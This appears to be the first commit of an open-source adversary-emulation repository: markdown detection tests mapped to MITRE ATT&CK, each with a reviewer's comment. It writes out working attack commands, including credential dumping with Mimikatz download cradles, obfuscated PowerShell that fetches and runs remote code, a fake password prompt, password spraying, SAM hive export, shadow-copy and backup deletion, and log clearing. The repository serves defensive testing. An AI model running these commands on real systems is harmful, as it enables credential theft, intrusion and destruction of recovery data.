Initial Commit

Initial Checkin
mac-defense-evasion
caseysmithrc 2017-10-11 10:35:17 -07:00
commit ac8dd2cfec
61 changed files with 1550 additions and 0 deletions

LICENSE.txt Normal file

@ -0,0 +1,22 @@
The MIT License
Copyright (c) 2016 Red Canary, Inc.
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.


@ -0,0 +1,6 @@
# Bash History
MITRE ATT&CK Technique: [T1139](https://attack.mitre.org/wiki/Technique/T1139)
cat ~/.bash_history | grep -e '-p ' -e 'pass' -e 'ssh' > loot.txt
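Review bot: the test only sees what bash has already flushed to disk: `~/.bash_history` is written when an interactive shell exits (or on `history -a` / `history -w`), so commands typed in the current session are invisible to `cat ~/.bash_history`; run `history -w` first or say so in the file. The `grep -e '-p '` pattern also matches any option called `-p`, not only password flags, which is acceptable for a loot grab but worth stating. Minor: `cat file | grep ...` can simply be `grep -e '-p ' -e 'pass' -e 'ssh' ~/.bash_history`.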

Linux/Linux.md Normal file

@ -0,0 +1,21 @@
## MITRE ATT&CK Matrix - Linux
| Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Execution | Collection | Exfiltration | Command and Control |
|------------------------------|-------------------------------|-------------------------------|----------------------------------------|----------------------------------------|---------------------------------|--------------------------|--------------------------------|-----------------------------------------------|-----------------------------------------|
| .bash_profile and .bashrc | Exploitation of Vulnerability | Binary Padding | [Bash History](Credential_Access/Bash_History.md) | Account Discovery | Application Deployment Software | Command-Line Interface | Audio Capture | Automated Exfiltration | Commonly Used Port |
| Bootkit | Setuid and Setgid | Clear Command History | Brute Force | File and Directory Discovery | Exploitation of Vulnerability | Graphical User Interface | Automated Collection | Data Compressed | Communication Through Removable Media |
| [Cron Job](Persistence/Cron_Job.md) | Sudo | Disabling Security Tools | Create Account | Permission Groups Discovery | Remote File Copy | Scripting | Clipboard Data | Data Encrypted | Connection Proxy |
| Hidden Files and Directories | Valid Accounts | Exploitation of Vulnerability | Credentials in Files | Process Discovery | Remote Services | Source | Data Staged | Data Transfer Size Limits | Custom Command and Control Protocol |
| Rc.common | Web Shell | File Deletion | Exploitation of Vulnerability | System Information Discovery | Third-party Software | Space after Filename | Data from Local System | Exfiltration Over Alternative Protocol | Custom Cryptographic Protocol |
| Redundant Access | | HISTCONTROL | Input Capture | System Network Configuration Discovery | | Third-party Software | Data from Network Shared Drive | Exfiltration Over Command and Control Channel | Data Encoding |
| Trap | | Hidden Files and Directories | Network Sniffing | System Network Connections Discovery | | Trap | Data from Removable Media | Exfiltration Over Other Network Medium | Data Obfuscation |
| Valid Accounts | | Indicator Removal from Tools | Private Keys | System Owner/User Discovery | | | Input Capture | Exfiltration Over Physical Medium | Fallback Channels |
| Web Shell | | Indicator Removal on Host | Two-Factor Authentication Interception | | | | Screen Capture | Scheduled Transfer | Multi-Stage Channels |
| | | Install Root Certificate | | | | | | | Multiband Communication |
| | | Masquerading | | | | | | | Multilayer Encryption |
| | | Redundant Access | | | | | | | Remote File Copy |
| | | Scripting | | | | | | | Standard Application Layer Protocol |
| | | Space after Filename | | | | | | | Standard Cryptographic Protocol |
| | | Timestomp | | | | | | | Standard Non-Application Layer Protocol |
| | | Valid Accounts | | | | | | | Uncommonly Used Port |
| | | | | | | | | | Web Service |


@ -0,0 +1,6 @@
# Bash History
MITRE ATT&CK Technique: [T1168](https://attack.mitre.org/wiki/Technique/T1168)
echo "* * * * * /tmp/evil.sh" > /tmp/persistevil && crontab /tmp/persistevil
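Review bot: the heading on the first line reads `# Bash History`, but this file is the Cron Job test (T1168); fix the title, since the matrix links it by name. More importantly, `crontab /tmp/persistevil` replaces the user's entire crontab, so running the test on a real host silently destroys existing entries; capture `crontab -l` first and restore it afterwards, or append instead: `(crontab -l; echo "* * * * * /tmp/evil.sh") | crontab -`. `/tmp/evil.sh` must also exist and be executable, otherwise cron logs an error every minute and nothing observable happens.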


@ -0,0 +1,6 @@
# Bash History
MITRE ATT&CK Technique: [T1139](https://attack.mitre.org/wiki/Technique/T1139)
cat ~/.bash_history | grep -e '-p ' -e 'pass' -e 'ssh' > loot.txt
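Review bot: this is a verbatim copy of the Linux file, which is fine for the matrix link, but on macOS `~/.bash_history` only exists when the user's login shell is bash; with zsh as the default shell (macOS 10.15 and later) the equivalent file is `~/.zsh_history`, so the test should mention that or grep both files.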


@ -0,0 +1,18 @@
# AppleScript
MITRE ATT&CK Technique: [T1155](https://attack.mitre.org/wiki/Technique/T1155)
## One-Liners
### Execute Shell Scripts
osascript "do shell script "echo \"import sys,base64,warnings;warnings.filterwarnings('ignore');exec(base64.b64decode('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'));\" | python &""
https://github.com/EmpireProject/Empire
### Prompt User for Password (Local Phishing)
osascript -e 'tell app "System Preferences" to activate' -e 'tell app "System Preferences" to activate' -e 'tell app "System Preferences" to display dialog "Software Update requires that you type your password to apply changes." & return & return default answer "" with icon 1 with hidden answer with title "Software Update"'
http://fuzzynop.blogspot.com/2014/10/osascript-for-local-phishing.html
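Review bot: the quoting on the `osascript "do shell script "echo ...` line is broken: there is no `-e`, and the first inner double quote terminates the outer string, so osascript fails before anything reaches `python`. Use `osascript -e 'do shell script "..."'` and escape the inner quotes accordingly; the base64 blob is a placeholder and should be labelled as something the tester supplies from Empire. In the password prompt one-liner, `tell app "System Preferences" to activate` is given twice; one is enough.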

Mac/Mac.md Normal file

@ -0,0 +1,26 @@
## MITRE ATT&CK Matrix - Mac
| Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Execution | Collection | Exfiltration | Command and Control |
|------------------------------|-------------------------------|-------------------------------|----------------------------------------|----------------------------------------|---------------------------------|--------------------------|--------------------------------|-----------------------------------------------|-----------------------------------------|
| .bash_profile and .bashrc | Dylib Hijacking | Binary Padding | [Bash History](Credential_Access/Bash_History.md) | Account Discovery | [AppleScript](Execution/AppleScript.md) | [AppleScript](Execution/AppleScript.md) | Automated Collection | Automated Exfiltration | Commonly Used Port |
| [Cron Job](Persistence/Cron_Job.md) | Exploitation of Vulnerability | Clear Command History | Brute Force | Application Window Discovery | Application Deployment Software | Command-Line Interface | Clipboard Data | Data Compressed | Communication Through Removable Media |
| Dylib Hijacking | Launch Daemon | Code Signing | Create Account | File and Directory Discovery | Exploitation of Vulnerability | Graphical User Interface | Data Staged | Data Encrypted | Connection Proxy |
| Hidden Files and Directories | Plist Modification | Disabling Security Tools | Credentials in Files | Network Share Discovery | Logon Scripts | Launchctl | Data from Local System | Data Transfer Size Limits | Custom Command and Control Protocol |
| LC_LOAD_DYLIB Addition | Setuid and Setgid | Exploitation of Vulnerability | Exploitation of Vulnerability | Permission Groups Discovery | Remote File Copy | Scripting | Data from Network Shared Drive | Exfiltration Over Alternative Protocol | Custom Cryptographic Protocol |
| Launch Agent | Startup Items | File Deletion | Input Capture | Process Discovery | Remote Services | Source | Data from Removable Media | Exfiltration Over Command and Control Channel | Data Encoding |
| Launch Daemon | Sudo | Gatekeeper Bypass | Input Prompt | Remote System Discovery | Third-party Software | Space after Filename | Input Capture | Exfiltration Over Other Network Medium | Data Obfuscation |
| Launchctl | Valid Accounts | HISTCONTROL | Keychain | Security Software Discovery | | Third-party Software | Screen Capture | Exfiltration Over Physical Medium | Fallback Channels |
| Login Item | Web Shell | Hidden Files and Directories | Network Sniffing | System Information Discovery | | Trap | | Scheduled Transfer | Multi-Stage Channels |
| Logon Scripts | | Hidden Users | Private Keys | System Network Configuration Discovery | | | | | Multiband Communication |
| Plist Modification | | Hidden Window | Securityd Memory | System Network Connections Discovery | | | | | Multilayer Encryption |
| Rc.common | | Indicator Removal from Tools | Two-Factor Authentication Interception | System Owner/User Discovery | | | | | Remote File Copy |
| Re-opened Applications | | Indicator Removal on Host | | | | | | | Standard Application Layer Protocol |
| Redundant Access | | LC_MAIN Hijacking | | | | | | | Standard Cryptographic Protocol |
| Startup Items | | Launchctl | | | | | | | Standard Non-Application Layer Protocol |
| Trap | | Masquerading | | | | | | | Uncommonly Used Port |
| Valid Accounts | | Plist Modification | | | | | | | Web Service |
| Web Shell | | Redundant Access | | | | | | | |
| | | Scripting | | | | | | | |
| | | Space after Filename | | | | | | | |
| | | Valid Accounts | | | | | | | |


@ -0,0 +1,6 @@
# Bash History
MITRE ATT&CK Technique: [T1168](https://attack.mitre.org/wiki/Technique/T1168)
echo "* * * * * /tmp/evil.sh" > /tmp/persistevil && crontab /tmp/persistevil
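Review bot: same copy-paste as the Linux version: the title says `# Bash History` for the Cron Job (T1168) test, and `crontab /tmp/persistevil` overwrites the user's existing crontab rather than adding to it. Fix the title and back up with `crontab -l` before the test (or append via `(crontab -l; echo "* * * * * /tmp/evil.sh") | crontab -`), then restore it afterwards.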

README.md Normal file

@ -0,0 +1,13 @@
# atomic-red-team
Small and highly portable detection tests mapped to the Mitre ATT&CK
Framework.
[Windows MITRE ATT&CK Matrix](Windows/Windows.md)
[Mac MITRE ATT&CK Matrix](Mac/Mac.md)
[Linux MITRE ATT&CK Matrix](Linux/Linux.md)
#### We did not create the MITRE ATT&CK Framework, we just think it is awesome and extensive.
#### ATT&CK and ATT&CK Matrix are trademarks of The MITRE Corporation


@ -0,0 +1,16 @@
# Clipboard Data
MITRE ATT&CK Technique: [T1115](https://attack.mitre.org/wiki/Technique/T1115)
## cmd
<command> | clip
clip < readme.txt
## PowerShell
echo Get-Process > things.txt
powershell
Get-Clipboard | iex
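Review bot: the PowerShell steps never put anything on the clipboard, so `Get-Clipboard | iex` executes whatever the clipboard happened to contain rather than the `Get-Process` text written to `things.txt`; insert `clip < things.txt` between `echo Get-Process > things.txt` and `powershell`. Also note that `Get-Clipboard` only exists in PowerShell 5.0 and later, so the test needs a minimum-version line like the Create Account file has.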


@ -0,0 +1,16 @@
# Brute Force
MITRE ATT&CK Technique: [T1110](https://attack.mitre.org/wiki/Technique/T1110)
## net.exe
### Password Spray
net user /domain > DomainUsers.txt
echo "Password1" >> pass.txt
echo "1q2w3e4r" >> pass.txt
Execute:
@FOR /F %n in (DomainUsers.txt) DO @FOR /F %p in (pass.txt) DO @net use \\COMPANYDC1\IPC$ /user:COMPANY\%n %p 1>NUL 2>&1 && @echo [*] %n:%p && @net use /delete \\COMPANYDC1\IPC$ > NUL
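Review bot: `net user /domain > DomainUsers.txt` emits a formatted table (header lines, three names per row, "The command completed successfully"), so `FOR /F %n in (DomainUsers.txt)` feeds header words and only the first column of each row into `net use`; parse the output or build the user list another way. `echo "Password1" >> pass.txt` in cmd writes the quotes into the file, so the loop tries `"Password1"` literally. The nesting is also backwards for a spray: it tries every password against one user before moving to the next, which is exactly the pattern that hits account lockout; a spray iterates one password across all users per pass, with a pause between passes longer than the lockout observation window.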


@ -0,0 +1,35 @@
# Create Account
MITRE ATT&CK Technique: [T1136](https://attack.mitre.org/wiki/Technique/T1136)
## Net.exe
Local user add:
Net user /add Trevor SmshBgr123
Add new user to localgroup:
net localgroup administrators jack /add
Domain add:
net user username \password \domain
Add user to Active Directory:
dsadd user CN=John,CN=Users,DC=it,DC=uk,DC=savilltech,DC=com -samid John -pwd Pa55word123
# Powershell 5.1
The following requires [Powershell 5.1](https://www.microsoft.com/en-us/download/details.aspx?id=54616)
Additional information [here](https://4sysops.com/archives/the-new-local-user-and-group-cmdlets-in-powershell-5-1/)
## Add User
New-LocalUser -FullName 'Trevor R.' -Name 'Trevor' -Password SmshBgr Description 'Pwnage account'
## Create a group
New-LocalGroup -Name 'Testgroup' -Description 'Testing group'
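Review bot: `net user username \password \domain` is not valid `net user` syntax; the domain form is `net user <username> <password> /add /domain`. In the PowerShell section `New-LocalUser ... -Password SmshBgr Description 'Pwnage account'` will not run: `-Password` takes a SecureString (`-Password (ConvertTo-SecureString 'SmshBgr' -AsPlainText -Force)`) and `Description` is missing its leading `-`. The file should also say that `net localgroup administrators jack /add`, `New-LocalUser` and `New-LocalGroup` need an elevated prompt, and that `dsadd` needs the AD DS tools installed.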


@ -0,0 +1,36 @@
# Credential Dumping
MITRE ATT&CK Technique: [T1003](https://attack.mitre.org/wiki/Technique/T1003)
## Powershell Mimikatz
Input:
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"
## Gsecdump
[Gsecdump](https://www.truesec.se/sakerhet/verktyg/saakerhet/gsecdump_v2.0b5)
Input:
gsecdump -a
## Windows Credential Editor
[Windows Credential Editor](http://www.ampliasecurity.com/research/windows-credentials-editor/)
Input:
wce -o output.txt
Output:
C:\>wce -o output.txt
WCE v1.2 (Windows Credentials Editor) - (c) 2010,2011 Amplia Security - by Hernan Ochoa (hernan@ampliasecurity.com)
Use -h for help.
C:\>type output.txt
test:AMPLIALABS:01020304050607080900010203040506:98971234567865019812734576890102
C:\>
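Review bot: the file should state that all three tools need local administrator rights (and, for `Invoke-Mimikatz -DumpCreds`, SeDebugPrivilege to read LSASS) and that each is flagged by most AV products, so the test belongs on a disposable host. The Invoke-Mimikatz one-liner downloads from the `master` branch of a third-party repository, so the payload can change underneath the test; pin a commit hash in the URL. The WCE output block is the vendor's sample run (hostname `AMPLIALABS`, dummy hashes), not output from this test, and should be labelled as such.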


@ -0,0 +1,31 @@
# File Deletion
MITRE ATT&CK Technique: [T1107](https://attack.mitre.org/wiki/Technique/T1107)
## cmd
del /f filename
rmdir example
## PowerShell
Remove-Item path c:\testfolder recurse
## vssadmin
vssadmin.exe Delete Shadows /All /Quiet
## wmic
wmic shadowcopy delete
## bcdedit
bcdedit /set {default} bootstatuspolicy ignoreallfailures
bcdedit /set {default} recoveryenabled no
## wbadmin
wbadmin delete catalog -quiet
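Review bot: the `vssadmin`, `wmic shadowcopy delete`, `bcdedit` and `wbadmin delete catalog` lines destroy every shadow copy, disable Windows recovery and delete the backup catalog, which is irreversible on a real system and needs an elevated prompt; the file should warn that this part is for a disposable VM only, or split it out, since it exercises ransomware-style inhibit-recovery behaviour rather than plain file deletion. `Remove-Item path c:\testfolder recurse` is missing the parameter dashes: `Remove-Item -Path c:\testfolder -Recurse`.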


@ -0,0 +1,13 @@
## Indicator Removal on Host
MITRE ATT&CK Technique: [T1070](https://attack.mitre.org/wiki/Technique/T1070)
## Wevtutil
Clear system logs
wevtutil cl System
Clear Security logs
wevtutil cl Security
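Review bot: `wevtutil cl` needs administrator rights, which the file should say. Worth adding for the detection side: clearing the Security log itself writes event 1102 ("The audit log was cleared") to Security, and clearing other logs writes event 104 to System, so the test leaves a reliable indicator of its own. The title uses `##` where every other file in this commit uses `#`.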


@ -0,0 +1,47 @@
## Account Discovery
MITRE ATT&CK Technique: [T1087](https://attack.mitre.org/wiki/Technique/T1087)
### Net user and group Enumeration
Domain Group Enumeration:
net groups "domain administrators" /domain
Domain User Enumeration:
net user <username> /domain
Local Group Enumeration:
net localgroup "administrators"
Local User Enumeration:
net user
## wmic.exe
### Reconnaissance
Input:
wmic useraccount get /ALL
Input:
wmic process get caption,executablepath,commandline
Input:
wmic qfe get description,installedOn /format:csv
Input:
wmic /node:"192.168.0.1" service where (caption like "%sql server (%")
Input:
get-wmiobject class "win32_share" namespace "root\CIMV2" computer "targetname"
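Review bot: `net groups "domain administrators" /domain` queries a group that does not exist by default; the built-in group is `Domain Admins`. The `get-wmiobject class "win32_share" namespace "root\CIMV2" computer "targetname"` line is missing its parameter dashes (`-Class`, `-Namespace`, `-ComputerName`) and fails as written. The whole `wmic.exe` block is duplicated verbatim in the Windows Management Instrumentation file later in this commit; keep it in one place and link to it from the other.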


@ -0,0 +1,12 @@
## File and Directory Discovery
MITRE ATT&CK Technique: [T1083](https://attack.mitre.org/wiki/Technique/T1083)
### Directory listing
Input:
dir c:\ >> %temp%\download
dir "c:\Documents and Settings" >> %temp%\download
dir "c:\Program Files\" >> %temp%\download
dir d:\ >> %temp%\download
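Review bot: `dir "c:\Documents and Settings"` targets the Windows XP profile root; on Vista and later that path is a junction to `C:\Users` with a deny-list ACE, so `dir` returns "Access is denied". Use `C:\Users` (or list both). Appending to `%temp%\download` with no extension is fine, but say that this file is the expected artifact so the reader knows what to look for.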


@ -0,0 +1,46 @@
## Query Registry
MITRE ATT&CK Technique: [T1012](https://attack.mitre.org/wiki/Technique/T1012)
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows"
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices
reg query HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify
reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit
reg query HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell
reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnceEx
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
Use the following command (as Administrator) to view the drivers configured to load during startup:
reg query hklm\system\currentcontrolset\services /s | findstr ImagePath 2>nul | findstr /Ri ".*\.sys$"
Reg Query HKLM\Software\Microsoft\Windows\CurrentVersion\Run
Reference: https://blog.cylance.com/windows-registry-persistence-part-2-the-run-keys-and-search-order
Reference: https://blog.cylance.com/windows-registry-persistence-part-1-introduction-attack-phases-and-windows-services
reg save HKLM\Security security.hive (Save security hive to a file)
reg save HKLM\System system.hive (Save system hive to a file)
reg save HKLM\SAM sam.hive (Save sam to a file)=
reg add [\\TargetIPaddr\] [RegDomain][ \Key ]
reg export [RegDomain]\[Key] [FileName]
reg import [FileName ]
reg query [\\TargetIPaddr\] [RegDomain]\[ Key ] /v [Valuename!] (you can to add /s for recurse all values )
Reference: http://www.handgrep.se/repository/cheatsheets/postexploitation/WindowsPost-Exploitation.pdf
Reference: https://www.offensive-security.com/wp-content/uploads/2015/04/wp.Registry_Quick_Find_Chart.en_us.pdf
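Review bot: `Winlogon\\Shell` on two of the query lines has a doubled backslash, and the `reg save HKLM\SAM sam.hive` line carries a stray trailing `=`. More substantively, the three `reg save` commands dump the SAM, SECURITY and SYSTEM hives, which is Credential Dumping (T1003), needs an elevated prompt, and does not belong under Query Registry (T1012); move them to the Credential Dumping file. The final `Reg Query HKLM\Software\Microsoft\Windows\CurrentVersion\Run` repeats an earlier line, and the bracketed `reg add`/`reg export`/`reg import` lines are syntax templates rather than runnable tests and should be marked as such.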


@ -0,0 +1,19 @@
# Remote System Discovery
MITRE ATT&CK Technique: [T1018](https://attack.mitre.org/wiki/Technique/T1018)
### net.exe
net view /domain
net view
### Ping
Ping Sweep:
for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i
### ARP
arp -a
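Review bot: the ping sweep uses single `%i`, which is correct at an interactive prompt but must be `%%i` inside a batch file; say which is intended. `-w 100` is a 100 ms timeout, so hosts across slow links will be missed, acceptable for a test but worth a remark. `net view /domain` relies on the legacy Computer Browser service (SMB1 era), so on current Windows builds it often returns error 6118 rather than a host list.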


@ -0,0 +1,16 @@
# Remote System Discovery
MITRE ATT&CK Technique: [T1082](https://attack.mitre.org/wiki/Technique/T1082)
## SystemInfo
Input:
systeminfo
## Reg
Input:
reg query HKLM\SYSTEM\CurrentControlSet\Services\Disk\Enum
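Review bot: the title reads `# Remote System Discovery` but the technique is T1082 System Information Discovery; fix the heading, since the matrix links by name. `reg query HKLM\SYSTEM\CurrentControlSet\Services\Disk\Enum` is a virtualisation check (disk vendor strings such as VMware or VBOX appear here); say that, because otherwise the reader cannot tell why it is listed alongside `systeminfo`.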


@ -0,0 +1,19 @@
## System Owner/User Discovery
MITRE ATT&CK Technique: [T1018](https://attack.mitre.org/wiki/Technique/T1018)
### cmd.exe
"cmd.exe" /C whoami
### wmic.exe
wmic useraccount get /ALL
### quser
quser /SERVER:"<computername>"
### qwinsta
qwinsta.exe" /server:<computername>
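Review bot: the technique ID is wrong: T1018 is Remote System Discovery; System Owner/User Discovery is T1033 and the link should point there. `qwinsta.exe" /server:<computername>` has a stray double quote. `wmic useraccount get /ALL` is the same command already used under Account Discovery and enumerates all accounts rather than the current user, so `whoami`, `quser` and `qwinsta` are the real tests here.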


@ -0,0 +1,5 @@
## bitsadmin.exe
Input:
bitsadmin.exe /transfer /Download http://bit.ly/L3g1tCrad1e Default_File_Path.ps1
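Review bot: this file has no ATT&CK technique line, unlike every other test in the commit; it belongs under Remote File Copy (T1105). The `bitsadmin /transfer` syntax is also off: the first argument after `/transfer` is the job name, so `/Download` is parsed as the name, and BITS requires an absolute local path, so a bare `Default_File_Path.ps1` is rejected. Use `bitsadmin /transfer <jobname> /download /priority normal <url> C:\full\path\Default_File_Path.ps1`.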


@ -0,0 +1,16 @@
## InstallUtil
MITRE ATT&CK Technique: [T1118](https://attack.mitre.org/wiki/Technique/T1118)
### Execution Examples:
Input:
x86 - C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll
x64 - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll
## Test Script
[InstallUtilBypass.cs](https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/InstallUtilBypass.cs)


@ -0,0 +1,68 @@
# PowerShell
MITRE ATT&CK Technique: [T1086](https://attack.mitre.org/wiki/Technique/T1086)
### Download Mimikatz and Dump credentials
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"
### Download Mimikatz and Dump credentials
Just download it:
(New-Object Net.WebClient).DownloadFile('http://bit.ly/L3g1tCrad1e','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))
Minor obfuscation:
(New-Object Net.WebClient).DownloadFile('http://bit.ly/L3g1tCrad1e','Default_File_Path.ps1');[ScriptBlock]::Create((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_}))).InvokeReturnAsIs()
All obfuscation:
Set-Variable HJ1 'http://bit.ly/L3g1tCrad1e';SI Variable:/0W 'Net.WebClient';Set-Item Variable:\gH 'Default_File_Path.ps1';ls _-*;Set-Variable igZ (.$ExecutionContext.InvokeCommand.(($ExecutionContext.InvokeCommand.PsObject.Methods|?{$_.Name-like'*Cm*t'}).Name).Invoke($ExecutionContext.InvokeCommand.(($ExecutionContext.InvokeCommand|GM|?{$_.Name-like'*om*e'}).Name).Invoke('*w-*ct',$TRUE,1))(Get-ChildItem Variable:0W).Value);Set-Variable J ((((Get-Variable igZ -ValueOn)|GM)|?{$_.Name-like'*w*i*le'}).Name);(Get-Variable igZ -ValueOn).((ChildItem Variable:J).Value).Invoke((Get-Item Variable:/HJ1).Value,(GV gH).Value);&( ''.IsNormalized.ToString()[13,15,48]-Join'')(-Join([Char[]](CAT -Enco 3 (GV gH).Value)))
Mimikatz - Cradlecraft PsSendKeys
$url='https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1';$wshell=New-Object -ComObject WScript.Shell;$reg='HKCU:\Software\Microsoft\Notepad';$app='Notepad';$props=(Get-ItemProperty $reg);[Void][System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms');@(@('iWindowPosY',([String]([System.Windows.Forms.Screen]::AllScreens)).Split('}')[0].Split('=')[5]),@('StatusBar',0))|ForEach{SP $reg (Item Variable:_).Value[0] (Variable _).Value[1]};$curpid=$wshell.Exec($app).ProcessID;While(!($title=GPS|?{(Item Variable:_).Value.id-ieq$curpid}|ForEach{(Variable _).Value.MainWindowTitle})){Start-Sleep -Milliseconds 500};While(!$wshell.AppActivate($title)){Start-Sleep -Milliseconds 500};$wshell.SendKeys('^o');Start-Sleep -Milliseconds 500;@($url,(' '*1000),'~')|ForEach{$wshell.SendKeys((Variable _).Value)};$res=$Null;While($res.Length -lt 2){[Windows.Forms.Clipboard]::Clear();@('^a','^c')|ForEach{$wshell.SendKeys((Item Variable:_).Value)};Start-Sleep -Milliseconds 500;$res=([Windows.Forms.Clipboard]::GetText())};[Windows.Forms.Clipboard]::Clear();@('%f','x')|ForEach{$wshell.SendKeys((Variable _).Value)};If(GPS|?{(Item Variable:_).Value.id-ieq$curpid}){@('{TAB}','~')|ForEach{$wshell.SendKeys((Item Variable:_).Value)}};@('iWindowPosDY','iWindowPosDX','iWindowPosY','iWindowPosX','StatusBar')|ForEach{SP $reg (Item Variable:_).Value $props.((Variable _).Value)};IEX($res);invoke-mimikatz -dumpcr
### Invoke-AppPathBypass
Note: Windows 10 only
Bypass is based on: https://enigma0x3.net/2017/03/14/bypassing-uac-using-app-paths/
Powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/enigma0x3/Misc-PowerShell-Stuff/master/Invoke-AppPathBypass.ps1'); Invoke-AppPathBypass"
At prompt, to test:
C:\Windows\System32\cmd.exe
### Obfuscated Powershell
Fancy obfuscation that reaches out to bit.ly/L3g1t to stdout: "SUCCESSFULLY EXECUTED POWERSHELL CODE FROM REMOTE LOCATION"
cmd /c "set apple=fish (cars help://bit.ly/L3g1t).content&&cmd /c set boat=%apple:fish=iex% ^&^&cmd /c set ab=%boat:cars=iwr% ^^^&^^^&cmd /c echo %ab:el=tt%|%ProgramData:~3,1%%ProgramData:~5,1%we%ProgramData:~7,1%she%Public:~12,1%%Public:~12,1% -"
Second test:
cmd /c "set apple=fish (cars ('http://bit.ly/L3g1tCrad1e).content&&cmd /c set boat=%apple:fish=iex% ^&^&cmd /c set ab=%boat:cars=iwr% ^^^&^^^&cmd /c echo %ab:el=tt%|%ProgramData:~3,1%%ProgramData:~5,1%we%ProgramData:~7,1%she%Public:~12,1%%Public:~12,1% -"
## Powershell Obfuscation
Provided by @danielbohannon
[Out-FINcodedCommand](https://github.com/danielbohannon/Out-FINcodedCommand/blob/master/README.md)
Setup:
Invoke-Expression (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/danielbohannon/Out-FINcodedCommand/master/Out-FINcodedCommand.ps1')
Input:
Out-FINcodedCommand -command "iex (iwr http://bit.ly/L3g1t).content" -FinalBinary powershell
Follow prompts to create variables.
Output:
cmd /c "set apple=fish (cars help://bit.ly/L3g1t).content&&cmd /c set boat=%apple:fish=iex% ^&^&cmd /c set ab=%boat:cars=iwr% ^^^&^^^&cmd /c echo %ab:el=tt%|%ProgramData:~3,1%%ProgramData:~5,1%we%ProgramData:~7,1%she%Public:~12,1%%Public:~12,1% -"
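Review bot: the second `### Download Mimikatz and Dump credentials` heading is a copy of the first, but that section is a generic download cradle for `bit.ly/L3g1tCrad1e` at three obfuscation levels, not a Mimikatz download; rename it. The `Second test:` line has an unbalanced `('http://bit.ly/L3g1tCrad1e).content` (the opening paren and quote are never closed), so it fails after the `%apple:fish=iex%` substitution. The `Output:` block under Out-FINcodedCommand is byte-for-byte the same as the `Obfuscated Powershell` example above it; one copy with a pointer is enough. Every cradle depends on an external bit.ly redirect, so the expected result (`SUCCESSFULLY EXECUTED POWERSHELL CODE FROM REMOTE LOCATION`) changes if those redirects change; host the endpoint in the repo.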


@ -0,0 +1,22 @@
## Regsvcs/Regasm
MITRE ATT&CK Technique: [T1121](https://attack.mitre.org/wiki/Technique/T1121)
### Execution Examples:
[DLL](https://github.com/redcanaryco/atomic-red-team/tree/master/Windows/Payloads/AllTheThings)
Input:
x86 C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe AllTheThings.dll
x64 C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regsvcs.exe AllTheThings.dll
x86 C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U AllTheThings.dll
x64 C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /U AllTheThings.dll
## Test Script
[RegSvcsRegAsmBypass.cs](https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/RegSvcsRegAsmBypass.cs)
